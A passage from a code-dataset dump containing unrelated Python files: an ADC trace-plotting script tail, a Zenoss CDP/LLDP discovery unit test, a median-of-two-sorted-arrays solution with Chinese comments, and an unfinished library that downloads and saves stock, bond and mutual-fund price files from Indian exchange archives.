plt.plot(np.transpose(newSignal2[20:-20]))\n plt.title('ADC value - all traces')\n \n plt.show()\n#%%\nallFramesInVolts = allFrames[:,20:-20]*(-2.5/16384)+2.5\nif PLOT_ADC_VS_N :\n \n # All single and all traces\n plt.figure(1)\n plt.subplot(211)\n plt.title('ADC value - single trace')\n plt.plot(allFramesInVolts[1])\n\n plt.subplot(212)\n plt.plot(np.transpose(allFramesInVolts))\n plt.title('ADC value - all traces')\n plt.show()\n \n#%%\nmaxValues = np.max(allFramesInVolts,1)\nif PLOT_ADC_VS_N :\n \n # All single and all traces\n plt.figure(1)\n plt.subplot(211)\n plt.title('ADC value - single trace')\n plt.plot(maxValues[0:666])\n\n plt.subplot(212)\n plt.plot(np.transpose(allFramesInVolts[112,0:1023]))\n plt.plot(np.transpose(allFramesInVolts[300,0:1023]))\n plt.plot(np.transpose(allFramesInVolts[484,0:1023]))\n plt.title('ADC value - all traces')\n plt.show()\n \n \n#%%\n# the histogram of the data\ncentralValue = 0\nif PLOT_SET_HISTOGRAM :\n nbins = 100\n EnergyTh = -50\n n = np.zeros(nbins)\n for i in range(0, imgDesc.shape[0]):\n # n, bins, patches = plt.hist(darkSub[5,:,:], bins=256, range=(0.0, 256.0), fc='k', ec='k')\n # [x,y] = np.where(darkSub[i,:,32:63]>EnergyTh)\n # h, b = np.histogram(darkSub[i,x,y], np.arange(-nbins/2,nbins/2+1))\n # h, b = np.histogram(np.average(darkSub[i,:,5]), np.arange(-nbins/2,nbins/2+1))\n dataSet = darkSub[i,:,5]\n h, b = np.histogram(np.average(dataSet), np.arange(centralValue-nbins/2,centralValue+nbins/2+1))\n n = n + h\n\n plt.bar(b[1:nbins+1],n, width = 0.55)\n plt.title('Histogram')\n plt.show()\n\n\n\n\n\n\n\n\n\n \n\n\n","sub_path":"software/scripts/imgProc/read_scope_data_from_file_v2.py","file_name":"read_scope_data_from_file_v2.py","file_ext":"py","file_size_in_byte":6499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"409439115","text":"##############################################################################\n#\n# Copyright (C) Zenoss, Inc. 2015, all rights reserved.\n#\n# This content is made available according to terms specified in\n# License.zenoss under the directory where your Zenoss product is installed.\n#\n##############################################################################\n\nfrom mock import Mock, sentinel\n\nfrom Products.ZenTestCase.BaseTestCase import BaseTestCase\n\nfrom ZenPacks.zenoss.Layer2.modeler.plugins \\\n .zenoss.snmp.CDPLLDPDiscover import _extract_cdp_lldp_maps\n\ncdpCacheEntry1 = {\n '10648.28': {\n 'cdpCacheAddress': '\\nW\\xfe\\x07',\n 'cdpCacheAddressType': 1,\n 'cdpCacheDeviceId': '08cc6843e573',\n 'cdpCacheDevicePort': 'gi52',\n 'cdpCacheNativeVLAN': 1,\n 'cdpCachePlatform': 'asdf'\n },\n}\n\nlldpRemEntry1 = {\n '0.100.22': {\n 'lldpRemPortDesc': '',\n 'lldpRemPortId': 'gi52',\n 'lldpRemSysDesc': '',\n 'lldpRemSysName': 'asdf'\n },\n}\n\ncdpCacheEntry2 = {\n '68.4': {\n 'cdpCachePlatform': 'N5K-C56128P',\n 'cdpCacheAddressType': 1,\n 'cdpCacheDevicePort': 'Ethernet1/34',\n 'cdpCacheNativeVLAN': 1,\n 'cdpCacheDeviceId': 'PVH00ADS02(FOC2048R0QV)',\n 'cdpCacheAddress': '\\n\\xd4\\x01\\x05'\n },\n '61.3': {\n 'cdpCachePlatform': 'N5K-C56128P',\n 'cdpCacheAddressType': 1,\n 'cdpCacheDevicePort': 'Ethernet1/34',\n 'cdpCacheNativeVLAN': 1,\n 'cdpCacheDeviceId': 'PVH00ADS01(FOC2048R0MF)',\n 'cdpCacheAddress': '\\n\\xd4\\x01\\x04'\n },\n}\n\nlldpRemEntry2 = {\n '0.60.2': {\n 'lldpRemSysName': 'PVH00ADS02',\n 'lldpRemSysDesc': 'Cisco NX-OS(tm) n6000, Software (n6000-uk9), Version 7.3(7)N1(1), RELEASE SOFTWARE Copyright (c) 2002-2012, 2016-2017 by Cisco Systems, Inc. Compiled 1/26/2020 22:00:00',\n 'lldpRemPortDesc': 'Ethernet1/34',\n 'lldpRemPortId': 'Eth1/34'\n },\n '0.3.10': {\n 'lldpRemSysName': 'AVX080739',\n 'lldpRemSysDesc': '',\n 'lldpRemPortDesc': '',\n 'lldpRemPortId': '\\xa0\\t\\xed\\x08\\x079'\n },\n '0.53.1': {\n 'lldpRemSysName': 'PVH00ADS01',\n 'lldpRemSysDesc': 'Cisco NX-OS(tm) n6000, Software (n6000-uk9), Version 7.3(7)N1(1), RELEASE SOFTWARE Copyright (c) 2002-2012, 2016-2017 by Cisco Systems, Inc. Compiled 1/26/2020 22:00:00',\n 'lldpRemPortDesc': 'Ethernet1/34',\n 'lldpRemPortId': 'Eth1/34'\n },\n '0.5.9': {\n 'lldpRemSysName': '',\n 'lldpRemSysDesc': '',\n 'lldpRemPortDesc': '',\n 'lldpRemPortId': '\\xc44k{\\xbe\\xd3'\n },\n '0.6.11': {\n 'lldpRemSysName': '',\n 'lldpRemSysDesc': '',\n 'lldpRemPortDesc': '',\n 'lldpRemPortId': '\\xdcJ>\\x8b\\xf4\\xd5'\n },\n '0.1.4': {\n 'lldpRemSysName': '',\n 'lldpRemSysDesc': '',\n 'lldpRemPortDesc': '',\n 'lldpRemPortId': '\\x88Q\\xfb?a\\x95'\n },\n '0.4.7': {\n 'lldpRemSysName': 'AVX081116',\n 'lldpRemSysDesc': '',\n 'lldpRemPortDesc': '',\n 'lldpRemPortId': '\\xa0\\t\\xed\\x08\\x11\\x16'\n },\n '0.2.8': {\n 'lldpRemSysName': 'AVXB0C617',\n 'lldpRemSysDesc': '',\n 'lldpRemPortDesc': '',\n 'lldpRemPortId': '\\xd4xV\\xb0\\xc6\\x17'\n },\n}\n\n\nclass TestCDPLLDPDiscover(BaseTestCase):\n\n def test_extraction_of_both(self):\n res = _extract_cdp_lldp_maps({\n 'cdpCacheEntry': cdpCacheEntry1,\n 'lldpRemEntry': lldpRemEntry1\n })\n self.assertEqual(sorted(res), [{\n 'description': '',\n 'device_port': 'gi52',\n 'id': 'lldp_0.100.22',\n 'title': 'asdf'\n }, {\n 'description': '',\n 'device_port': 'gi52',\n 'id': 'cdp_10648.28',\n 'ip_address': '10.87.254.7',\n 'location': '',\n 'native_vlan': 1,\n 'title': 'asdf'\n }])\n\n def test_cdp(self):\n res = _extract_cdp_lldp_maps({\n 'cdpCacheEntry': cdpCacheEntry1,\n })\n self.assertEqual(res, [{\n 'description': '',\n 'device_port': 'gi52',\n 'id': 'cdp_10648.28',\n 'ip_address': '10.87.254.7',\n 'location': '',\n 'native_vlan': 1,\n 'title': 'asdf'\n }])\n\n def test_lldp(self):\n res = _extract_cdp_lldp_maps({\n 'lldpRemEntry': lldpRemEntry1\n })\n self.assertEqual(res, [{\n 'description': '',\n 'device_port': 'gi52',\n 'id': 'lldp_0.100.22',\n 'title': 'asdf'\n }])\n\n def test_hex_lldp_rem_port_id_encoding(self):\n res = _extract_cdp_lldp_maps({\n 'lldpRemEntry': lldpRemEntry2,\n 'cdpCacheEntry': cdpCacheEntry2,\n })\n\n self.assertEqual(res[5], {\n 'description': '',\n 'device_port': 'a009ed080739',\n 'id': 'lldp_0.3.10',\n 'title': 'AVX080739'\n }\n )\n\n\ndef test_suite():\n from unittest import TestSuite, makeSuite\n suite = TestSuite()\n suite.addTest(makeSuite(TestCDPLLDPDiscover))\n return suite\n","sub_path":"ZenPacks/zenoss/Layer2/tests/test_cdp_lldp_discover.py","file_name":"test_cdp_lldp_discover.py","file_ext":"py","file_size_in_byte":5154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"209079840","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 16 09:54:22 2017\n\n@author: harvey\n\"\"\"\n\n#给两个整型的有序数组,要求找出这两个数组中的中位数,时间复杂度为O(log(m+n))。\n\n#即两个数组合并后的中位数,合并过程中,重复元素保留;\n#若合并后的数组有奇数个元素,则直接输出中位数;\n#若合并后的数组有偶数个元素,则输出中间两个数的平均值\n\n#整体思路类似于在一个无序数组内找最小的k个数。我们通过两个数组各自的中位\n#数将两个数组A、B分为四个部分,分别为A1、A2、B1、B2。现在我们来找出他们\n#中第k小的数。如果A的中位数比B的中位数大,那么B1中的数比A2和B2中的都\n#小,且小于部分A1中的数。此时,如果k>len(A1)+len(B1),那么第k个数就不可能\n#在B1,因为比B1的数小的数最多只有B1加上部分的A1,也就是klen(A1)+len(B1),矛盾。同理可以推理出另外两种情况。\n\nclass Solution(object):\n def findMedianSortedArrays(self, nums1, nums2):\n \"\"\"\n :type nums1: List[int]\n :type nums2: List[int]\n :rtype: float\n \"\"\"\n length1 = len(nums1)\n length2 = len(nums2)\n k = (length1+length2)//2 #地板除\n if(length1 + length2) % 2 == 0: #合并后有偶数个元素,取第k个和第k-1个元素的平均值\n return (self.findK(nums1, nums2, k)+self.findK(nums1, nums2, k-1)) / 2\n else: #合并后有奇数个元素,直接去第k个元素\n return self.findK(nums1, nums2, k)\n \n #求解两个有序数组合并后的第k大的元素\n def findK(self, nums1, nums2, k):\n if not nums1: #nums为空的情况\n return nums2[k]\n if not nums2: #nums2为空的情况\n return nums1[k]\n if k == 0: #返回合并数组的第一个元素\n return min(nums1[0], nums2[0])\n \n length1 = len(nums1)\n length2 = len(nums2)\n if nums1[length1 // 2] > nums2[length2 // 2]:\n if k > length1 // 2 + length2 // 2: #第k个数不可能在B1\n return self.findK(nums1, nums2[length2//2 + 1:], k-length2 // 2 - 1)\n else: #第k个数不可能在A2\n return self.findK(nums1[:length1//2],nums2,k)\n else:\n if k > length1//2+length2//2: #第k个数不可能在A1\n return self.findK(nums1[length1//2+1:],nums2,k-length1//2-1)\n else: #第k个数不可能在B2\n return self.findK(nums1,nums2[:length2//2],k)\n \nif __name__ == \"__main__\":\n print(Solution().findMedianSortedArrays([1,2],[1,2,3]))\n print(Solution().findMedianSortedArrays([],[2,3]))\n print(Solution().findMedianSortedArrays([1, 2, 3],[4, 5, 6]))\n \n ","sub_path":"median_of_two_sorted_arrays.py","file_name":"median_of_two_sorted_arrays.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"624798786","text":"#!/usr/bin/env python3\n\nfrom libs.ppsettings import pp_settings\n\nfrom libs.pptable import PpTable\nfrom libs.ppgetallweekend import get_all_week_ends\nfrom libs.exceptions import RequestError, CopyError\nfrom libs.ppstdlib import create_dir_if_not\n\nimport pandas as pd\nfrom pandas import ExcelWriter\nfrom datetime import datetime as dt, timedelta\nfrom bs4 import BeautifulSoup as bs\nimport io\nimport requests\nimport os\nimport sys,gc\nfrom shutil import copyfile\nimport zipfile\n\n\n\ndef diff_df(df_source, df_dest, compare_cols=[]):\n\t# try:\n\t# print(compare_cols)\n\tif compare_cols:\n\t\tif not df_source.empty:\n\n\t\t\t# make a new column compare for both data frame with the by making the column values into one\n\t\t\tif len(compare_cols) == 1:\n\t\t\t\tdf_source['compare'] = df_source[compare_cols]\n\t\t\t\tdf_dest['compare'] = df_dest[compare_cols]\n\t\t\telse:\n\t\t\t\tdf_source['compare'] = df_source[compare_cols].apply(\n\t\t\t\t\tlambda x: ''.join(x), axis=1)\n\t\t\t\tdf_dest['compare'] = df_dest[compare_cols].apply(\n\t\t\t\t\tlambda x: ''.join(x), axis=1)\n\n\t\t\t# find all difference securities from new to existence\n\t\t\tnew_symbol = set(df_source.groupby('compare').groups.keys(\n\t\t\t)) - set(df_dest.groupby('compare').groups.keys())\n\n\t\t\t\"\"\" print(len(df_dest.groupby('compare').groups.keys()))\n\t\t\tprint(len(df_source.groupby('compare').groups.keys()))\n\n\t\t\tprint(new_symbol) \"\"\"\n\t\t\t# selecting only diffent securites\n\t\t\tdf_source = df_source[df_source['compare'].isin(list(new_symbol))]\n\n\t\t\t# drop the compare column\n\t\t\tdf_source = df_source.drop('compare', axis=1)\n\t\t\"\"\" else:\n\t\t\t# Handle exception\n\texcept:\n\t\t# my exception message\n\telse: \"\"\"\n\treturn df_source\n\n\ndef save_if(filename, df_new, compare_cols=[], doDiff=True, ignoreExist=False):\n\n\tif ignoreExist:\n\t\tif os.path.exists(filename):\n\t\t\tprint(\"{} already exist. Ignoring save....\".format(filename))\n\t\t\treturn\n\n\theader = True\n\tappend_write = 'w+'\n\tif doDiff:\n\t\tdf_exist = pd.DataFrame()\n\t\tappend_write = 'a' # append if already exists\n\t\theader = False\n\t\tif not os.path.exists(filename):\n\t\t\theader = True\n\t\t\topen(filename, \"w\") # make a new file if not\n\t\telse:\n\t\t\tdf_exist = pd.read_csv(filename, dtype=str, keep_default_na=False)\n\t\t\tdf_new = diff_df(df_new, df_exist, compare_cols)\n\n\tif not df_new.empty:\n\t\tdf_new.to_csv(filename, mode=append_write, index=False, header=header)\n\t\tprint(\"data has been saved successfully into {}\".format(filename))\n\t\treturn filename\n\treturn \"\"\n\n\ndef load_data_frame(filename, hardcheck=False):\n\tdf = pd.DataFrame()\n\ttry:\n\t\tif os.path.exists(filename):\n\t\t\tdf = pd.read_csv(filename, dtype=str, keep_default_na=False)\n\t\telse:\n\t\t\tif hardcheck:\n\t\t\t\traise OSError\n\t\t\telse:\n\t\t\t\treturn df\n\texcept OSError:\n\t\tprint('Source Path not found:', filename)\n\t\traise\n\telse:\n\t\treturn df\n\n# parent class\n\n\nclass PpSecurity:\n\turl = \"\"\n\tcolumns = []\n\tsettings = {}\n\texchange = \"\"\n\tmain_df = pd.DataFrame()\n\trawoutput = \"\"\n\tppoutput = \"\"\n\tcallPriFunc = \"\"\n\tmisspri = []\n\n\tdef set_url(self, url):\n\t\tif not url:\n\t\t\traise Exception('undefined url')\n\t\tself.url = url\n\t\t# print(self.url)\n\n\tdef __init__(self, edate, fdate=\"\"):\n\n\t\tself.settings = pp_settings()[self.exchange]\n\n\t\turl = self.settings[\"url\"][\"current\"].format(\n\t\t\tdt.strptime(edate, '%m%d%Y').strftime(\"%d%m%Y\"))\n\n\t\tif fdate != \"\":\n\t\t\tfdate, edate = edate, fdate\n\t\t\turl = self.settings[\"url\"][\"hist\"].format(dt.strptime(fdate, '%m%d%Y').strftime(\"%d-%b-%Y\"),\n\t\t\t\t\t\t\t\t\t\t\t\t\t dt.strptime(edate, '%m%d%Y').strftime(\"%d-%b-%Y\"))\n\n\t\tprint(url)\n\t\tself.set_url(url)\n\n\tdef copy_price(self, source, dest,intoDir=''):\n\n\t\tsource = self.settings['path']['pp']+intoDir+source+\".csv\"\n\t\tdest = self.settings['path']['pp']+intoDir+dest+\".csv\"\n\t\tif not os.path.exists(source):\n\t\t\traise CopyError('701', source)\n\t\tsource_df = pd.read_csv(source, delimiter=' *, *', engine='python',\n\t\t\t\t\t\t\t\tkeep_default_na=False, dtype=str)\n\n\t\tif not os.path.exists(dest):\n\t\t\t# adding exception handling\n\t\t\ttry:\n\t\t\t\tcopyfile(source, dest)\n\t\t\texcept IOError as e:\n\t\t\t\traise CopyError('703', e)\n\t\t\texcept:\n\t\t\t\traise CopyError('703', sys.exc_info())\n\t\t\t\n\t\telse:\n\t\t\tdest_df = pd.read_csv(dest, delimiter=' *, *', engine='python',\n\t\t\t\t\t\t\t\tkeep_default_na=False, dtype=str)\n\t\t\t\n\t\t\t# print(dest_df.info())\n\t\t\t# print(source_df[~source_df.symbol.isin(dest_df.symbol)].info())\n\t\t\tdest_df = pd.concat([dest_df,source_df[~source_df.symbol.isin(dest_df.symbol)]],ignore_index=True)\n\t\t\tdest_df.to_csv(dest, mode=\"w+\", index=False)\n\t\t\t# print(dest_df.info())\n\t\t\t# print(source_df.info())\n\n\t\t# pd.concat([sat, fri[~fri.symbol.isin(sat.symbol)]], ignore_index=True)\n\n\t\t\n\n\t\t# print()\n\t\t# print(self.settings['path']['pp']+dest+\".csv\")\n\n\n\n\t\"\"\"\n\tIn the event of a network problem (e.g. DNS failure, refused connection, etc), Requests will raise a ConnectionError exception.\n\n\tIn the event of the rare invalid HTTP response, Requests will raise an HTTPError exception.\n\n\tIf a request times out, a Timeout exception is raised.\n\n\tIf a request exceeds the configured number of maximum redirections, a TooManyRedirects exception is raised.\n\n\tAll exceptions that Requests explicitly raises inherit from requests.exceptions.RequestException\n\t\"\"\"\n\n\tdef request_url(self, url, stream = False):\n\t\tprint(\"Downloading from {}\".format(url))\n\t\ttry:\n\t\t\tif not stream:\n\t\t\t\tr = requests.get(url)\n\t\t\t\tr.raise_for_status()\n\t\t\t\treturn r.content\n\t\t\telse:\n\t\t\t\tr = requests.get(url,stream=True)\n\t\t\t\tr.raise_for_status()\n\t\t\t\treturn r\n\t\texcept requests.exceptions.ConnectionError as e:\n\t\t\tprint(\"connection error {} \".format(url))\n\t\t\traise RequestError('401', url)\n\t\texcept requests.exceptions.HTTPError as e:\n\t\t\tprint(\"HTTP error {} \".format(url))\n\t\t\tself.misspri.append(url);\n\t\t\traise RequestError('402', url)\n\t\texcept requests.exceptions.Timeout as e:\n\t\t\tprint(\"Timeout error {} \".format(url))\n\t\t\traise RequestError('403', url)\n\t\texcept requests.exceptions.TooManyRedirects as e:\n\t\t\tprint(\"Too Many Redirects error {} \".format(url))\n\t\t\traise RequestError('404', url)\n\t\texcept requests.exceptions.RequestException as e:\n\t\t\tprint(\"Request Exception error {} \".format(url))\n\t\t\traise RequestError('405', url)\n\n\tdef show(self):\n\t\tprint(self.main_df)\n\n\tdef save(self, isCopyRaw=True, doDiff=False, saveOnly=\"\", includeTime=False,intoDir = ''):\n\n\t\tprint(\"Saving prices ....\")\n\t\tif self.main_df.empty:\n\t\t\tprint(\"The Downloaded file doesn't contains records\")\n\t\t\treturn\n\t\t\n\t\t# raw_df_columns = []\n\t\traw_df_columns=self.settings[\"ppformat\"].keys()\n\t\t\n\t\tfor k, df_new in self.main_df.groupby(self.settings[\"saveby\"]):\n\t\t\tdf_new=df_new.reset_index(drop=True)\n\t\t\tdateKey=dt.strptime(\n\t\t\t\tk.strip(), \"%d-%b-%Y\").strftime(\"%m%d%Y\")\n\t\t\tif saveOnly != \"\":\n\t\t\t\tif (dateKey == saveOnly):\n\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\tcontinue\n\t\t\trawPath=self.settings[\"path\"]['raw']\n\t\t\tppPath=self.settings[\"path\"]['pp']\n\n\n\t\t\tif intoDir != '':\n\t\t\t\trawPath += intoDir\n\t\t\t\tppPath += intoDir\n\t\t\t\tcreate_dir_if_not(rawPath)\n\t\t\t\tcreate_dir_if_not(ppPath)\n\t\t\t\trawPath += '/'\n\t\t\t\tppPath += '/'\n\t\t\t\t\n\n\t\t\trawPath += dateKey\n\t\t\tppPath += dateKey\n\t\t\t\n\t\t\tif includeTime:\n\t\t\t\ttimestr=dt.now().strftime(\"%H:%M:%S\")\n\t\t\t\trawPath += \"_\" + timestr\n\t\t\t\tppPath += \"_\" + timestr\n\t\t\t\n\t\t\tif isCopyRaw:\n\t\t\t\tself.rawoutput=save_if(rawPath + \".csv\", df_new, doDiff, ignoreExist=True)\n\t\t\tself.ppoutput=save_if(ppPath+\".csv\", df_new[list(raw_df_columns)].rename(columns=self.settings[\"ppformat\"]),\n\t\t\t\t self.settings['duplicate'], doDiff)\n\n\tdef fill_holiday(self, edate):\n\t\tdestpath=self.settings[\"path\"]['pp'] + edate + \".csv\"\n\t\tedate=dt.strptime(edate, '%m%d%Y')\n\n\t\tadjustment={5: -1, 6: -2}.get(edate.weekday())\n\t\tif adjustment:\n\t\t\tedate += timedelta(days=adjustment)\n\n\t\tdf_exist=load_data_frame(\n\t\t\tself.settings[\"path\"]['pp'] + edate.strftime(\"%m%d%Y\") + \".csv\", hardcheck=True)\n\n\t\t# print(destpath)\n\t\theader=True\n\t\tdf_new=pd.DataFrame()\n\t\tif os.path.exists(destpath):\n\t\t\theader=False\n\n\t\tdf_new=load_data_frame(destpath)\n\n\t\tif df_new.empty:\n\t\t\tdf_new=df_exist\n\t\telse:\n\t\t\tdf_new=diff_df(df_exist, df_new, self.settings['duplicate'])\n\t\tif not df_new.empty:\n\t\t\tdf_new.to_csv(destpath, mode='a+', index=False, header=header)\n\t\t\tprint(\"data has been saved successfully into {}\".format(destpath))\n\n\tdef read_csv(self, path):\n\t\tself.main_df=pd.read_csv(path, delimiter=' *, *', engine='python', keep_default_na=False,\n\t\t\t\t\t\t\t\t\t\t\tdtype=str)\n\t\t# self.main_df = self.main_df.str.strip()\n\n\tdef make_spread_sheet(self, sourcedf=None, storein=\"\", groupby=\"\", sheetname=\"\"):\n\n\t\tsourcedf=self.main_df if sourcedf is None else sourcedf\n\t\tstorein=\"output\" if storein == \"\" else storein\n\t\tsheetname=\"sheet\" if sheetname == \"\" else sheetname\n\n\t\txlwriter=ExcelWriter(storein+'.xlsx')\n\n\t\tif not groupby:\n\t\t\tsourcedf.to_excel(xlwriter, sheetname)\n\t\telse:\n\t\t\tclass MyError(Exception):\n \t\t\t\t# Constructor or Initializer\n\t\t\t\tdef __init__(self, value):\n\t\t\t\t\tself.value=value\n\n\t\t\t\t# __str__ is to print() the value\n\t\t\t\tdef __str__(self):\n\t\t\t\t\treturn(repr(self.value))\n\n\t\t\ttry:\n\t\t\t\tif groupby not in sourcedf.columns:\n\t\t\t\t\traise(MyError(groupby))\n\n\t\t\t# Value of Exception is stored in error\n\t\t\texcept MyError as error:\n\t\t\t\tprint('A New Exception occured: ', error.value)\n\t\t\t\tsys.exit()\n\t\t\telse:\n\t\t\t\tif not sourcedf.empty:\n\t\t\t\t\tsourcedf=sourcedf.groupby(groupby)\n\t\t\t\t\tfor key in sourcedf.groups:\n\t\t\t\t\t\tsourcedf.get_group(key).to_excel(xlwriter, key)\n\t\t\t\t\txlwriter.save()\n\t\t\t\t\tprint(\"{} has been created successfully...\".format(storein))\n\t\t\t\telse:\n\t\t\t\t\treturn []\n\n\n\t\tif groupby:\n\t\t\treturn sourcedf.groups\n\t\treturn []\n\n\tdef update_log(self,log_string=''):\n\t\tlogfile = self.settings['path']['raw'] + self.settings['log']\n\t\twith open(logfile,'a+') as fp:\n\t\t\tfp.write('{}\\t{}\\n'.format(dt.now().strftime('%m%d%Y %H:%M:%S'),self.url))\n\t\t\t\n\tdef clrDF(self):\n\t\tif not self.main_df.empty:\n\t\t\tdel self.main_df\n\t\t\tgc.collect()\n\t\t\tself.main_df = pd.DataFrame()\n\t\t\t\n\tdef UnZipBB(self,edate):\n\t\t#UnZip Bse Bond\n\t\tbdf = pd.DataFrame()\n\t\tr = self.request_url(self.url,True)\n\t\tif r.ok :\n\t\t\tzip_ref = zipfile.ZipFile(io.BytesIO(r.content))\n\t\t\tfor zipinfo in zip_ref.infolist():\n\t\t\t\tflName = zipinfo.filename\n\t\t\t\tdf = pd.read_csv(zip_ref.open(flName)).dropna(axis='columns', how = \"all\")\n\t\t\t\tif flName[:3] == \"wdm\":\n\t\t\t\t\tdf = df.rename(columns ={\"Scrip Code\": \"Security_cd\",\n\t\t\t\t\t\t\t\t\t\t\t\t\"Close Price\": \"LTP\"})\n\t\t\t\t\tdf['ISIN No.'] = df.apply(lambda row: row.Security_cd , axis = 1)\n\t\t\t\telif flName[:4] == \"icdm\":\n\t\t\t\t\tdf = df.rename(columns ={\"Security Code\":\"Security_cd\", \n\t\t\t\t\t\t\t\t\t\t\t\"Face Value\": \"FACE VALUE\"})\n\t\t\t\telif flName[:6] == \"fgroup\":\n\t\t\t\t\tdf['LTP'] = df.apply(lambda row: (row['Close Price']/row['FACE VALUE'])*100 , axis = 1)\n\t\t\t\t\t\n\t\t\t\tdf['TRADING_DATE'] = edate.strftime('%d-%b-%Y')\n\t\t\t\tbdf = bdf.append(df,sort=False)\n\t\t\tzip_ref.close()\n\t\t\treturn bdf\n\t\telse :\n\t\t\tprint (\"Unable to unzip the Http response {}\".format(self.url))\n\t\n\tdef Unzip(self,flName):\n\t\tr = self.request_url(self.url,True)\n\t\tif r.ok :\n\t\t\tzip_ref = zipfile.ZipFile(io.BytesIO(r.content))\n\t\t\tdf = pd.read_csv(zip_ref.open(flName)).dropna(axis='columns', how = \"all\")\n\t\t\tzip_ref.close()\n\t\t\treturn df\n\t\telse :\n\t\t\tprint (\"Unable to unzip the Http response {}\".format(self.url))\n\t\t\n\tdef NseF(self,edate):\n\t\turl = \"https://archives.nseindia.com/content/historical/DERIVATIVES/{}/{}/{}.zip\";\n\t\tmon = edate.strftime(\"%^b\")\n\t\tflName = \"fo{}{}{}bhav.csv\".format(edate.strftime(\"%d\"),mon,edate.year);\n\t\tself.url = url.format(edate.year,mon,flName)\n\t\tdframe = self.Unzip(flName)\n\t\tself.main_df = self.main_df.append(dframe,sort=False)\n\t\t\n\tdef NseB(self,edate):\n\t\tself.url = \"https://archives.nseindia.com/archives/debt/cbm/cbm_trd{}.csv\".format(edate.strftime(\"%Y%m%d\"))\n\t\tdframe = pd.read_csv(io.StringIO(self.request_url(\n\t\t\tself.url).decode('utf-8')), delimiter=' *, *', engine='python', keep_default_na=False, dtype=str)\n\t\tself.main_df = self.main_df.append(dframe,sort=False)\n\t\t\n\tdef BseB(self,edate):\n\t\tself.url = \"https://www.bseindia.com/download/Bhavcopy/Debt/DEBTBHAVCOPY{}.zip\".format(edate.strftime(\"%d%m%Y\"))\n\t\tdframe = self.UnZipBB(edate)\n\t\tself.main_df = self.main_df.append(dframe,sort=False)\n\n\tdef BseE(self,edate):\n\t\tisin = dt.strptime(\"12312016\",'%m%d%Y')\n\t\turl = \"https://www.bseindia.com/download/BhavCopy/Equity/EQ\"\n\t\tflNme = \"EQ\"\n\t\tpdate = edate.strftime('%d%m%-y')\n\t\tif edate >= isin :\n\t\t\tflNme += \"_ISINCODE_\" + pdate + \".CSV\"\n\t\t\tself.url = url + \"_ISINCODE_\" + pdate + \".zip\"\n\t\t\tdframe = self.Unzip(flNme)\n\t\telse :\n\t\t\tflNme += pdate + \".CSV\"\n\t\t\tself.url = url + pdate + \"_CSV.zip\"\n\t\t\tdframe = self.Unzip(flNme)\n\t\t\t#The below columns available when you download the file using ISIN code\n\t\t\tdframe['ISIN_CODE'] = dframe.apply(lambda row: row.SC_CODE , axis = 1)\n\t\t\t\n\t\t\n\t\t# if 'TRADING_DATE' not in dframe.columns:\n\t\tdframe['TRADING_DATE'] = edate.strftime('%d-%b-%Y')\n\t\t\t\n\t\tself.main_df = self.main_df.append(dframe,sort=False)\n\t\t\n\t\t\n\tdef DPrice(self,edate):\n\t\tif not edate:\n\t\t\tprint(\"Enter date you would like to download the price.\")\n\t\t\tsys.exit(0)\n\t\ttry:\n\t\t\tif self.callPriFunc == \"BE\":\n\t\t\t\tself.BseE(edate)\n\t\t\telif self.callPriFunc == \"BB\":\n\t\t\t\tself.BseB(edate)\n\t\t\telif self.callPriFunc == \"NB\":\n\t\t\t\tself.NseB(edate)\n\t\t\telif self.callPriFunc == \"NF\":\n\t\t\t\tself.NseF(edate)\n\t\texcept:\n\t\t\tprint(\"Fail to Download {}\".format(self.url))\n\t\n\tdef DHistPrice(self,edate,fdate):\n\t\tif not edate and not fdate:\n\t\t\tprint(\"Enter one date you would like to download the price.\")\n\t\t\tsys.exit(0)\n\t\t\n\t\tedate = dt.strptime(edate, '%m%d%Y')\n\t\tfdate = dt.strptime(fdate, '%m%d%Y')\n\t\tinc = timedelta(1)\n\t\twhile edate <= fdate :\n\t\t\tself.DPrice(edate)\n\t\t\tedate += inc\n# child class\n\n\nclass PpBse(PpSecurity):\n\tdef __init__(self, edate=\"\"):\n\t\tself.exchange=\"bse\"\n\t\tself.settings=pp_settings()[self.exchange]\n\t\t\n\tdef suck_E(self, edate, fdate=\"\"):\n\t\tprint(\"Download Prices For Equities\")\n\t\tself.clrDF()\n\t\tself.callPriFunc = 'BE'\n\t\tif fdate:\n\t\t\tself.DHistPrice(edate,fdate)\n\t\telse:\n\t\t\tedate = dt.strptime(edate, '%m%d%Y')\n\t\t\tself.DPrice(edate)\n\t\t\n\tdef suck_B(self,edate,fdate=\"\"):\n\t\tprint(\"Download Historical Prices For Bonds\")\n\t\tself.clrDF()\n\t\tself.callPriFunc = 'BB'\n\t\tif fdate:\n\t\t\tself.DHistPrice(edate,fdate)\n\t\telse:\n\t\t\tedate = dt.strptime(edate, '%m%d%Y')\n\t\t\tself.DPrice(edate)\n\t\t\n\t\tbondSett = self.settings[\"saveBy\"][\"BO\"]\n\t\tself.settings[\"ppformat\"] = bondSett[\"ppformat\"];\n\t\n\tdef cpyPri(self,fdate,tdate):\n\t\tself.copy_price(fdate,tdate)\n\t\tself.copy_price(fdate,tdate,\"bond/\")\n\n# child class\nclass PpAmfi(PpSecurity):\n\n\tdelim=';'\t\t\t# by default delim is ';'\n\n\t# def __init__(self):\n\t# self.exchange = \"amfi\"\n\t# self.settings = ppsettings()[self.exchange]\n\n\tdef __init__(self, edate=\"\", fdate=\"\"):\n\t\tself.exchange=\"amfi\"\n\n\t\tif not edate and not fdate:\n\t\t\tself.settings=pp_settings()[self.exchange]\n\t\telse:\n\t\t\tif fdate:\n\t\t\t\tsuper().__init__(edate, fdate)\n\t\t\telse:\n\t\t\t\tsuper().__init__(edate)\n\n\tdef suck(self):\n\t\t# print(\"downloading prices from \" + self.url + \"....\")\n\t\tself.__soup=bs(self.request_url(self.url).decode('utf-8'), \"lxml\")\n\t\tself.rowsep=\"\\r\\n\"\n\t\tcore_path = self.settings['path']['raw'] + 'core/' + dt.now().strftime(\"%m%d%Y_%H:%M:%S\")+\".txt\"\n\t\twith open(core_path,'w+') as fp:\n\t\t\tfp.write(self.__soup.text)\n\n\t\t# self.__soup = 